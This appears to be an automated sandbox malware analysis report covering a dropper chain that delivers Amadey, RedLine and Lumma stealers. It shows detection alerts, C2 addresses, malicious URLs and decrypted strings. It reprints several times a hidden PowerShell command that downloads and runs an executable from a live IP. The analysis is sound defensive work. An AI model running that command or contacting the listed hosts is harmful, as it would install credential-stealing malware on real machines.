C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 5160, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;, ProcessId: 7132, ProcessName: powershell.exe
                            Sigma detected: Non Interactive PowerShell Process Spawned
                            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;, CommandLine|base64offset|contains: hv)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta C:\Users\user\AppData\Local\Temp\huS4b5Vj8.hta, ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 5160, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;, ProcessId: 7132, ProcessName: powershell.exe

                            Data Obfuscation

                            barindex
                            Sigma detected: Powershell download and execute file
                            Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;, CommandLine|base64offset|contains: hv)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta C:\Users\user\AppData\Local\Temp\huS4b5Vj8.hta, ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 5160, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;, ProcessId: 7132, ProcessName: powershell.exe

                            Suricata Signatures

                            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                            2025-02-01T21:45:12.978061+010020283713Unknown Traffic192.168.2.657266104.21.79.9443TCP
                            2025-02-01T21:45:13.674661+010020283713Unknown Traffic192.168.2.657267104.21.79.9443TCP
                            2025-02-01T21:45:15.298266+010020283713Unknown Traffic192.168.2.657269104.21.79.9443TCP
                            2025-02-01T21:45:18.211813+010020283713Unknown Traffic192.168.2.657271104.21.79.9443TCP
                            2025-02-01T21:45:19.798954+010020283713Unknown Traffic192.168.2.657273104.21.79.9443TCP
                            2025-02-01T21:45:21.449432+010020283713Unknown Traffic192.168.2.657274104.21.79.9443TCP
                            2025-02-01T21:45:22.831874+010020283713Unknown Traffic192.168.2.657277104.21.79.9443TCP
                            2025-02-01T21:45:26.232765+010020283713Unknown Traffic192.168.2.657279104.21.79.9443TCP
                            2025-02-01T21:48:18.023736+010020283713Unknown Traffic192.168.2.657362172.67.181.203443TCP
                            2025-02-01T21:48:19.226824+010020283713Unknown Traffic192.168.2.657365172.67.181.203443TCP
                            2025-02-01T21:48:20.686722+010020283713Unknown Traffic192.168.2.657366172.67.181.203443TCP
                            2025-02-01T21:48:29.147888+010020283713Unknown Traffic192.168.2.657367172.67.181.203443TCP
                            2025-02-01T21:48:29.991723+010020283713Unknown Traffic192.168.2.657368172.67.181.203443TCP
                            2025-02-01T21:48:33.919702+010020283713Unknown Traffic192.168.2.657369172.67.181.203443TCP
                            2025-02-01T21:48:35.099289+010020283713Unknown Traffic192.168.2.657370172.67.181.203443TCP
                            2025-02-01T21:48:36.313957+010020283713Unknown Traffic192.168.2.657371172.67.181.203443TCP
                            2025-02-01T21:48:37.697994+010020283713Unknown Traffic192.168.2.657372172.67.181.203443TCP
                            2025-02-01T21:48:38.543653+010020283713Unknown Traffic192.168.2.657373172.67.181.203443TCP
                            2025-02-01T21:48:39.368083+010020283713Unknown Traffic192.168.2.657374172.67.181.203443TCP
                            2025-02-01T21:48:41.962227+010020283713Unknown Traffic192.168.2.657375172.67.181.203443TCP
                            2025-02-01T21:48:42.185154+010020283713Unknown Traffic192.168.2.657376172.67.181.203443TCP
                            2025-02-01T21:48:42.988521+010020283713Unknown Traffic192.168.2.657377172.67.181.203443TCP
                            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                            2025-02-01T21:45:13.128563+010020546531A Network Trojan was detected192.168.2.657266104.21.79.9443TCP
                            2025-02-01T21:45:14.487457+010020546531A Network Trojan was detected192.168.2.657267104.21.79.9443TCP
                            2025-02-01T21:45:26.764910+010020546531A Network Trojan was detected192.168.2.657279104.21.79.9443TCP
                            2025-02-01T21:48:18.733257+010020546531A Network Trojan was detected192.168.2.657362172.67.181.203443TCP
                            2025-02-01T21:48:19.710830+010020546531A Network Trojan was detected192.168.2.657365172.67.181.203443TCP
                            2025-02-01T21:48:29.281626+010020546531A Network Trojan was detected192.168.2.657367172.67.181.203443TCP
                            2025-02-01T21:48:30.547658+010020546531A Network Trojan was detected192.168.2.657368172.67.181.203443TCP
                            2025-02-01T21:48:38.690837+010020546531A Network Trojan was detected192.168.2.657373172.67.181.203443TCP
                            2025-02-01T21:48:40.124110+010020546531A Network Trojan was detected192.168.2.657374172.67.181.203443TCP
                            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                            2025-02-01T21:45:13.128563+010020498361A Network Trojan was detected192.168.2.657266104.21.79.9443TCP
                            2025-02-01T21:48:18.733257+010020498361A Network Trojan was detected192.168.2.657362172.67.181.203443TCP
                            2025-02-01T21:48:29.281626+010020498361A Network Trojan was detected192.168.2.657367172.67.181.203443TCP
                            2025-02-01T21:48:38.690837+010020498361A Network Trojan was detected192.168.2.657373172.67.181.203443TCP
                            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                            2025-02-01T21:45:14.487457+010020498121A Network Trojan was detected192.168.2.657267104.21.79.9443TCP
                            2025-02-01T21:48:19.710830+010020498121A Network Trojan was detected192.168.2.657365172.67.181.203443TCP
                            2025-02-01T21:48:30.547658+010020498121A Network Trojan was detected192.168.2.657368172.67.181.203443TCP
                            2025-02-01T21:48:40.124110+010020498121A Network Trojan was detected192.168.2.657374172.67.181.203443TCP
                            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                            2025-02-01T21:45:12.978061+010020591501Domain Observed Used for C2 Detected192.168.2.657266104.21.79.9443TCP
                            2025-02-01T21:45:13.674661+010020591501Domain Observed Used for C2 Detected192.168.2.657267104.21.79.9443TCP
                            2025-02-01T21:45:15.298266+010020591501Domain Observed Used for C2 Detected192.168.2.657269104.21.79.9443TCP
                            2025-02-01T21:45:18.211813+010020591501Domain Observed Used for C2 Detected192.168.2.657271104.21.79.9443TCP
                            2025-02-01T21:45:19.798954+010020591501Domain Observed Used for C2 Detected192.168.2.657273104.21.79.9443TCP
                            2025-02-01T21:45:21.449432+010020591501Domain Observed Used for C2 Detected192.168.2.657274104.21.79.9443TCP
                            2025-02-01T21:45:22.831874+010020591501Domain Observed Used for C2 Detected192.168.2.657277104.21.79.9443TCP
                            2025-02-01T21:45:26.232765+010020591501Domain Observed Used for C2 Detected192.168.2.657279104.21.79.9443TCP
                            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                            2025-02-01T21:47:32.803212+010020450001Malware Command and Control Activity Detected103.84.89.22233791192.168.2.657335TCP
                            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                            2025-02-01T21:45:12.704710+010020446961A Network Trojan was detected192.168.2.657265185.215.113.4380TCP
                            2025-02-01T21:47:17.834866+010020446961A Network Trojan was detected192.168.2.657331185.215.113.4380TCP
                            2025-02-01T21:48:18.368146+010020446961A Network Trojan was detected192.168.2.657363185.215.113.4380TCP
                            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                            2025-02-01T21:47:39.698978+010020450011Malware Command and Control Activity Detected103.84.89.22233791192.168.2.657335TCP
                            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                            2025-02-01T21:45:12.493293+010020591491Domain Observed Used for C2 Detected192.168.2.6574401.1.1.153UDP
                            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                            2025-02-01T21:45:17.579346+010020480941Malware Command and Control Activity Detected192.168.2.657269104.21.79.9443TCP
                            2025-02-01T21:48:35.644896+010020480941Malware Command and Control Activity Detected192.168.2.657370172.67.181.203443TCP
                            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                            2025-02-01T21:45:05.154824+010028561471A Network Trojan was detected192.168.2.657262185.215.113.4380TCP
                            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                            2025-02-01T21:45:11.983159+010028561221A Network Trojan was detected185.215.113.4380192.168.2.657263TCP
                            2025-02-01T21:47:12.419943+010028561221A Network Trojan was detected185.215.113.4380192.168.2.657329TCP
                            2025-02-01T21:48:17.646714+010028561221A Network Trojan was detected185.215.113.4380192.168.2.657360TCP
                            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                            2025-02-01T21:45:08.191752+010028033053Unknown Traffic192.168.2.657264185.215.113.9780TCP
                            2025-02-01T21:47:13.141257+010028033053Unknown Traffic192.168.2.657330185.215.113.9780TCP
                            2025-02-01T21:48:13.820277+010028033053Unknown Traffic192.168.2.657361185.215.113.1680TCP
                            2025-02-01T21:48:19.350088+010028033053Unknown Traffic192.168.2.657364185.215.113.1680TCP
                            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                            2025-02-01T21:47:26.212296+010028496621Malware Command and Control Activity Detected192.168.2.657335103.84.89.22233791TCP
                            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                            2025-02-01T21:47:33.211334+010028493511Malware Command and Control Activity Detected192.168.2.657335103.84.89.22233791TCP
                            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                            2025-02-01T21:47:45.909275+010028482001Malware Command and Control Activity Detected192.168.2.657348103.84.89.22233791TCP
                            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                            2025-02-01T21:47:40.112824+010028493521Malware Command and Control Activity Detected192.168.2.657343103.84.89.22233791TCP
                            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                            2025-02-01T21:47:26.212296+010018000001Malware Command and Control Activity Detected192.168.2.657335103.84.89.22233791TCP

                            Joe Sandbox Signatures

                            Click to jump to signature section

                            Show All Signature Results

                            AV Detection

                            barindex
                            Antivirus detection for URL or domain
                            Source: https://rampnatleadk.click:443/apiAvira URL Cloud: Label: malware
                            Source: https://rampnatleadk.click/LAvira URL Cloud: Label: malware
                            Source: https://warlikedbeliev.org/apiORAvira URL Cloud: Label: malware
                            Source: https://rampnatleadk.click/apiFAvira URL Cloud: Label: malware
                            Source: https://rampnatleadk.click/tAvira URL Cloud: Label: malware
                            Source: https://rampnatleadk.click/dAvira URL Cloud: Label: malware
                            Source: https://rampnatleadk.click/api&Avira URL Cloud: Label: malware
                            Source: http://185.215.113.97/files/notfinancing/random.exeAvira URL Cloud: Label: malware
                            Source: https://rampnatleadk.click/apiBAvira URL Cloud: Label: malware
                            Source: https://rampnatleadk.click/apimAvira URL Cloud: Label: malware
                            Source: http://185.215.113.43/Zu7JuNko/index.phpSAvira URL Cloud: Label: malware
                            Source: http://185.215.113.97/files/SQL_gulong/random.exeAvira URL Cloud: Label: malware
                            Source: https://warlikedbeliev.org:443/apiAvira URL Cloud: Label: malware
                            Source: https://rampnatleadk.click/apikAvira URL Cloud: Label: malware
                            Source: https://rampnatleadk.click/Avira URL Cloud: Label: malware
                            Source: http://185.215.113.43/Zu7JuNko/index.phpOAvira URL Cloud: Label: malware
                            Source: http://185.215.113.43/Zu7JuNko/index.php3Avira URL Cloud: Label: malware
                            Source: https://warlikedbeliev.org/dAvira URL Cloud: Label: malware
                            Source: https://rampnatleadk.click:443/api.default-release/key4.dbPKAvira URL Cloud: Label: malware
                            Source: https://rampnatleadk.click/MMqfAvira URL Cloud: Label: malware
                            Source: http://185.215.113.16/steam/random.exe?Avira URL Cloud: Label: malware
                            Source: https://warlikedbeliev.org/api0Avira URL Cloud: Label: malware
                            Antivirus detection for dropped file
                            Source: C:\Users\user\AppData\Local\Temp\1062369001\28f48f066a.exeAvira: detection malicious, Label: TR/Crypt.TPM.Gen
                            Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[1].exeAvira: detection malicious, Label: TR/Crypt.TPM.Gen
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeAvira: detection malicious, Label: TR/Crypt.TPM.Gen
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXEAvira: detection malicious, Label: TR/Crypt.TPM.Gen
                            Source: C:\Users\user\AppData\Local\Temp\1062371001\0dd40f41c4.exeAvira: detection malicious, Label: TR/Crypt.XPACK.Gen
                            Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[1].exeAvira: detection malicious, Label: TR/Crypt.TPM.Gen
                            Source: C:\Users\user\AppData\Local\Temp\1062370001\8c36d696e4.exeAvira: detection malicious, Label: TR/Crypt.TPM.Gen
                            Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[1].exeAvira: detection malicious, Label: TR/Crypt.XPACK.Gen
                            Found malware configuration
                            Source: 0000000D.00000002.2266795268.0000000000301000.00000040.00000001.01000000.0000000F.sdmpMalware Configuration Extractor: Amadey {"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}
                            Source: 21.2.8c36d696e4.exe.b10000.0.unpackMalware Configuration Extractor: RedLine {"C2 url": ["103.84.89.222:33791"], "Bot Id": "cheat"}
                            Source: 28f48f066a.exe.3640.20.memstrminMalware Configuration Extractor: LummaC {"C2 url": "https://rampnatleadk.click/api", "Build Version": "fBkCmu--labinstall"}
                            Multi AV Scanner detection for dropped file
                            Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\random[1].exeReversingLabs: Detection: 55%
                            Source: C:\Users\user\AppData\Local\Temp\1062370001\8c36d696e4.exeReversingLabs: Detection: 55%
                            Multi AV Scanner detection for submitted file
                            Source: random.exeVirustotal: Detection: 26%Perma Link
                            Joe Sandbox ML detected suspicious sample
                            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                            Machine Learning detection for dropped file
                            Source: C:\Users\user\AppData\Local\Temp\1062369001\28f48f066a.exeJoe Sandbox ML: detected
                            Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[1].exeJoe Sandbox ML: detected
                            Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[1].exeJoe Sandbox ML: detected
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeJoe Sandbox ML: detected
                            Source: C:\Users\user\AppData\Local\Temp\tmp2E19.tmpJoe Sandbox ML: detected
                            Source: C:\Users\user\AppData\Local\Temp\1062372001\1e1a1f5243.exeJoe Sandbox ML: detected
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXEJoe Sandbox ML: detected
                            Source: C:\Users\user\AppData\Local\Temp\1062371001\0dd40f41c4.exeJoe Sandbox ML: detected
                            Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[1].exeJoe Sandbox ML: detected
                            Source: C:\Users\user\AppData\Local\Temp\1062370001\8c36d696e4.exeJoe Sandbox ML: detected
                            Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[1].exeJoe Sandbox ML: detected
                            Machine Learning detection for sample
                            Source: random.exeJoe Sandbox ML: detected
                            Sample uses string decryption to hide its real strings
                            Source: 0000000D.00000002.2266795268.0000000000301000.00000040.00000001.01000000.0000000F.sdmpString decryptor: 185.215.113.43
                            Source: 0000000D.00000002.2266795268.0000000000301000.00000040.00000001.01000000.0000000F.sdmpString decryptor: /Zu7JuNko/index.php
                            Source: 0000000D.00000002.2266795268.0000000000301000.00000040.00000001.01000000.0000000F.sdmpString decryptor: S-%lu-
                            Source: 0000000D.00000002.2266795268.0000000000301000.00000040.00000001.01000000.0000000F.sdmpString decryptor: abc3bc1985
                            Source: 0000000D.00000002.2266795268.0000000000301000.00000040.00000001.01000000.0000000F.sdmpString decryptor: skotes.exe
                            Source: 0000000D.00000002.2266795268.0000000000301000.00000040.00000001.01000000.0000000F.sdmpString decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
                            Source: 0000000D.00000002.2266795268.0000000000301000.00000040.00000001.01000000.0000000F.sdmpString decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
                            Source: 0000000D.00000002.2266795268.0000000000301000.00000040.00000001.01000000.0000000F.sdmpString decryptor: Startup
                            Source: 0000000D.00000002.2266795268.0000000000301000.00000040.00000001.01000000.0000000F.sdmpString decryptor: cmd /C RMDIR /s/q
                            Source: 0000000D.00000002.2266795268.0000000000301000.00000040.00000001.01000000.0000000F.sdmpString decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Run
                            Source: 0000000D.00000002.2266795268.0000000000301000.00000040.00000001.01000000.0000000F.sdmpString decryptor: rundll32
                            Source: 0000000D.00000002.2266795268.0000000000301000.00000040.00000001.01000000.0000000F.sdmpString decryptor: Programs
                            Source: 0000000D.00000002.2266795268.0000000000301000.00000040.00000001.01000000.0000000F.sdmpString decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                            Source: 0000000D.00000002.2266795268.0000000000301000.00000040.00000001.01000000.0000000F.sdmpString decryptor: %USERPROFILE%
                            Source: 0000000D.00000002.2266795268.0000000000301000.00000040.00000001.01000000.0000000F.sdmpString decryptor: cred.dll|clip.dll|
                            Source: 0000000D.00000002.2266795268.0000000000301000.00000040.00000001.01000000.0000000F.sdmpString decryptor: cred.dll
                            Source: 0000000D.00000002.2266795268.0000000000301000.00000040.00000001.01000000.0000000F.sdmpString decryptor: clip.dll
                            Source: 0000000D.00000002.2266795268.0000000000301000.00000040.00000001.01000000.0000000F.sdmpString decryptor: http://
                            Source: 0000000D.00000002.2266795268.0000000000301000.00000040.00000001.01000000.0000000F.sdmpString decryptor: https://
                            Source: 0000000D.00000002.2266795268.0000000000301000.00000040.00000001.01000000.0000000F.sdmpString decryptor: /quiet
                            Source: 0000000D.00000002.2266795268.0000000000301000.00000040.00000001.01000000.0000000F.sdmpString decryptor: /Plugins/
                            Source: 0000000D.00000002.2266795268.0000000000301000.00000040.00000001.01000000.0000000F.sdmpString decryptor: &unit=
                            Source: 0000000D.00000002.2266795268.0000000000301000.00000040.00000001.01000000.0000000F.sdmpString decryptor: shell32.dll
                            Source: 0000000D.00000002.2266795268.0000000000301000.00000040.00000001.01000000.0000000F.sdmpString decryptor: kernel32.dll
                            Source: 0000000D.00000002.2266795268.0000000000301000.00000040.00000001.01000000.0000000F.sdmpString decryptor: GetNativeSystemInfo
                            Source: 0000000D.00000002.2266795268.0000000000301000.00000040.00000001.01000000.0000000F.sdmpString decryptor: ProgramData\
                            Source: 0000000D.00000002.2266795268.0000000000301000.00000040.00000001.01000000.0000000F.sdmpString decryptor: AVAST Software
                            Source: 0000000D.00000002.2266795268.0000000000301000.00000040.00000001.01000000.0000000F.sdmpString decryptor: Kaspersky Lab
                            Source: 0000000D.00000002.2266795268.0000000000301000.00000040.00000001.01000000.0000000F.sdmpString decryptor: Panda Security
                            Source: 0000000D.00000002.2266795268.0000000000301000.00000040.00000001.01000000.0000000F.sdmpString decryptor: Doctor Web
                            Source: 0000000D.00000002.2266795268.0000000000301000.00000040.00000001.01000000.0000000F.sdmpString decryptor: 360TotalSecurity
                            Source: 0000000D.00000002.2266795268.0000000000301000.00000040.00000001.01000000.0000000F.sdmpString decryptor: Bitdefender
                            Source: 0000000D.00000002.2266795268.0000000000301000.00000040.00000001.01000000.0000000F.sdmpString decryptor: Norton
                            Source: 0000000D.00000002.2266795268.0000000000301000.00000040.00000001.01000000.0000000F.sdmpString decryptor: Sophos
                            Source: 0000000D.00000002.2266795268.0000000000301000.00000040.00000001.01000000.0000000F.sdmpString decryptor: Comodo
                            Source: 0000000D.00000002.2266795268.0000000000301000.00000040.00000001.01000000.0000000F.sdmpString decryptor: WinDefender
                            Source: 0000000D.00000002.2266795268.0000000000301000.00000040.00000001.01000000.0000000F.sdmpString decryptor: 0123456789
                            Source: 0000000D.00000002.2266795268.0000000000301000.00000040.00000001.01000000.0000000F.sdmpString decryptor: Content-Type: multipart/form-data; boundary=----
                            Source: 0000000D.00000002.2266795268.0000000000301000.00000040.00000001.01000000.0000000F.sdmpString decryptor: ------
                            Source: 0000000D.00000002.2266795268.0000000000301000.00000040.00000001.01000000.0000000F.sdmpString decryptor: ?scr=1
                            Source: 0000000D.00000002.2266795268.0000000000301000.00000040.00000001.01000000.0000000F.sdmpString decryptor: Content-Type: application/x-www-form-urlencoded
                            Source: 0000000D.00000002.2266795268.0000000000301000.00000040.00000001.01000000.0000000F.sdmpString decryptor: SYSTEM\CurrentControlSet\Control\ComputerName\ComputerName
                            Source: 0000000D.00000002.2266795268.0000000000301000.00000040.00000001.01000000.0000000F.sdmpString decryptor: ComputerName
                            Source: 0000000D.00000002.2266795268.0000000000301000.00000040.00000001.01000000.0000000F.sdmpString decryptor: abcdefghijklmnopqrstuvwxyz0123456789-_
                            Source: 0000000D.00000002.2266795268.0000000000301000.00000040.00000001.01000000.0000000F.sdmpString decryptor: -unicode-
                            Source: 0000000D.00000002.2266795268.0000000000301000.00000040.00000001.01000000.0000000F.sdmpString decryptor: SYSTEM\CurrentControlSet\Control\UnitedVideo\CONTROL\VIDEO\
                            Source: 0000000D.00000002.2266795268.0000000000301000.00000040.00000001.01000000.0000000F.sdmpString decryptor: SYSTEM\ControlSet001\Services\BasicDisplay\Video
                            Source: 0000000D.00000002.2266795268.0000000000301000.00000040.00000001.01000000.0000000F.sdmpString decryptor: VideoID
                            Source: 0000000D.00000002.2266795268.0000000000301000.00000040.00000001.01000000.0000000F.sdmpString decryptor: DefaultSettings.XResolution
                            Source: 0000000D.00000002.2266795268.0000000000301000.00000040.00000001.01000000.0000000F.sdmpString decryptor: DefaultSettings.YResolution
                            Source: 0000000D.00000002.2266795268.0000000000301000.00000040.00000001.01000000.0000000F.sdmpString decryptor: SOFTWARE\Microsoft\Windows NT\CurrentVersion
                            Source: 0000000D.00000002.2266795268.0000000000301000.00000040.00000001.01000000.0000000F.sdmpString decryptor: ProductName
                            Source: 0000000D.00000002.2266795268.0000000000301000.00000040.00000001.01000000.0000000F.sdmpString decryptor: CurrentBuild
                            Source: 0000000D.00000002.2266795268.0000000000301000.00000040.00000001.01000000.0000000F.sdmpString decryptor: rundll32.exe
                            Source: 0000000D.00000002.2266795268.0000000000301000.00000040.00000001.01000000.0000000F.sdmpString decryptor: "taskkill /f /im "
                            Source: 0000000D.00000002.2266795268.0000000000301000.00000040.00000001.01000000.0000000F.sdmpString decryptor: " && timeout 1 && del
                            Source: 0000000D.00000002.2266795268.0000000000301000.00000040.00000001.01000000.0000000F.sdmpString decryptor: && Exit"
                            Source: 0000000D.00000002.2266795268.0000000000301000.00000040.00000001.01000000.0000000F.sdmpString decryptor: " && ren
                            Source: 0000000D.00000002.2266795268.0000000000301000.00000040.00000001.01000000.0000000F.sdmpString decryptor: Powershell.exe
                            Source: 0000000D.00000002.2266795268.0000000000301000.00000040.00000001.01000000.0000000F.sdmpString decryptor: -executionpolicy remotesigned -File "
                            Source: 0000000D.00000002.2266795268.0000000000301000.00000040.00000001.01000000.0000000F.sdmpString decryptor: shutdown -s -t 0
                            Source: 0000000D.00000002.2266795268.0000000000301000.00000040.00000001.01000000.0000000F.sdmpString decryptor: random

                            Phishing

                            barindex
                            Yara detected obfuscated html page
                            Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\huS4b5Vj8.hta, type: DROPPED
                            Source: random.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                            Source: unknownHTTPS traffic detected: 104.26.13.31:443 -> 192.168.2.6:57340 version: TLS 1.0
                            Source: unknownHTTPS traffic detected: 104.21.79.9:443 -> 192.168.2.6:57266 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 104.21.79.9:443 -> 192.168.2.6:57267 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 104.21.79.9:443 -> 192.168.2.6:57269 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 104.21.79.9:443 -> 192.168.2.6:57271 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 104.21.79.9:443 -> 192.168.2.6:57273 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 104.21.79.9:443 -> 192.168.2.6:57274 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 104.21.79.9:443 -> 192.168.2.6:57277 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 104.21.79.9:443 -> 192.168.2.6:57279 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 172.67.181.203:443 -> 192.168.2.6:57362 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 172.67.181.203:443 -> 192.168.2.6:57365 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 172.67.181.203:443 -> 192.168.2.6:57366 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 172.67.181.203:443 -> 192.168.2.6:57367 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 172.67.181.203:443 -> 192.168.2.6:57368 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 172.67.181.203:443 -> 192.168.2.6:57369 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 172.67.181.203:443 -> 192.168.2.6:57370 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 172.67.181.203:443 -> 192.168.2.6:57371 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 172.67.181.203:443 -> 192.168.2.6:57372 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 172.67.181.203:443 -> 192.168.2.6:57373 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 172.67.181.203:443 -> 192.168.2.6:57374 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 172.67.181.203:443 -> 192.168.2.6:57375 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 172.67.181.203:443 -> 192.168.2.6:57376 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 172.67.181.203:443 -> 192.168.2.6:57377 version: TLS 1.2
                            Source: Binary string: Q.Core.pdb source: powershell.exe, 00000009.00000002.2271100545.0000018B6F2AB000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: ws\dll\mscorlib.pdb|s8o source: powershell.exe, 00000009.00000002.2271100545.0000018B6F2AB000.00000004.00000020.00020000.00000000.sdmp
                            Source: C:\Users\user\Desktop\random.exeCode function: 0_2_0037DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,0_2_0037DBBE
                            Source: C:\Users\user\Desktop\random.exeCode function: 0_2_0034C2A2 FindFirstFileExW,0_2_0034C2A2
                            Source: C:\Users\user\Desktop\random.exeCode function: 0_2_003868EE FindFirstFileW,FindClose,0_2_003868EE
                            Source: C:\Users\user\Desktop\random.exeCode function: 0_2_0038698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,0_2_0038698F
                            Source: C:\Users\user\Desktop\random.exeCode function: 0_2_0037D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_0037D076
